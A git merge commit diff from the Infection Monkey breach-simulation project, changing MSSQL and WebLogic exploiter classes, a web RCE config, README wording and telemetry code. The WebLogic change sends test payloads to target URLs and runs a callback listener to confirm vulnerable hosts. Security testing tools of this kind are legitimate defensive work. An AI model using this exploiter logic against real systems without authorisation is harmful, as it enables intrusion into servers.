Merge remote-tracking branch 'origin/develop' into develop

This commit is contained in:
Daniel Goldberg 2019-01-30 10:33:24 +02:00
commit a3cd142d8c
5 changed files with 50 additions and 26 deletions

View File

@ -21,7 +21,6 @@ class MSSQLExploiter(HostExploiter):
def __init__(self, host): def __init__(self, host):
super(MSSQLExploiter, self).__init__(host) super(MSSQLExploiter, self).__init__(host)
self._config = __import__('config').WormConfiguration
self.attacks_list = [mssqlexec_utils.CmdShellAttack] self.attacks_list = [mssqlexec_utils.CmdShellAttack]
def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH): def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):

View File

@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
exploit_config['upload_commands'] = None exploit_config['upload_commands'] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
exploit_config['url_extensions'] = None exploit_config['url_extensions'] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
exploit_config['stop_checking_urls'] = False exploit_config['stop_checking_urls'] = False

View File

@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls, stop_checking=False):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) exploitable = False
for url in urls:
if self.check_if_exploitable_weblogic(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable_weblogic(self, url, httpd):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):
@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
lock.acquire() lock.acquire()
return httpd, lock return httpd, lock
def _stop_http_server(self, httpd, lock): @staticmethod
def _stop_http_server(httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
""" """
def __init__(self, local_ip, local_port, lock, max_requests=1): def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip self.local_ip = local_ip
self._local_port = local_port self.local_port = local_port
self.get_requests = 0 self.get_requests = 0
self.max_requests = max_requests self.max_requests = max_requests
self._stopped = False self._stopped = False
@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
LOG.info('Server received a request from vulnerable machine') LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1 self.get_requests += 1
LOG.info('Server waiting for exploited machine request...') LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S) httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True httpd.daemon = True
self.lock.release() self.lock.release()
while not self._stopped and self.get_requests < self.max_requests: while not self._stopped and self.get_requests < self.max_requests:

View File

@ -1,5 +1,5 @@
To get development versions of Monkey Island and Monkey look into deployment scripts folder. To get development versions of Monkey Island and Monkey look into deployment scripts folder.
If you only want to monkey from scratch you may refer to the instructions below. If you only want to build monkey from scratch you may reference instructions below.
The monkey is composed of three separate parts. The monkey is composed of three separate parts.
* The Infection Monkey itself - PyInstaller compressed python archives * The Infection Monkey itself - PyInstaller compressed python archives

View File

@ -149,8 +149,7 @@ class Telemetry(flask_restful.Resource):
new_scan = \ new_scan = \
{ {
"timestamp": telemetry_json["timestamp"], "timestamp": telemetry_json["timestamp"],
"data": data, "data": data
"scanner": telemetry_json['data']['scanner']
} }
mongo.db.edge.update( mongo.db.edge.update(
{"_id": edge["_id"]}, {"_id": edge["_id"]},
@ -160,7 +159,6 @@ class Telemetry(flask_restful.Resource):
node = mongo.db.node.find_one({"_id": edge["to"]}) node = mongo.db.node.find_one({"_id": edge["to"]})
if node is not None: if node is not None:
if new_scan["scanner"] == "TcpScanner":
scan_os = new_scan["data"]["os"] scan_os = new_scan["data"]["os"]
if "type" in scan_os: if "type" in scan_os:
mongo.db.node.update({"_id": node["_id"]}, mongo.db.node.update({"_id": node["_id"]},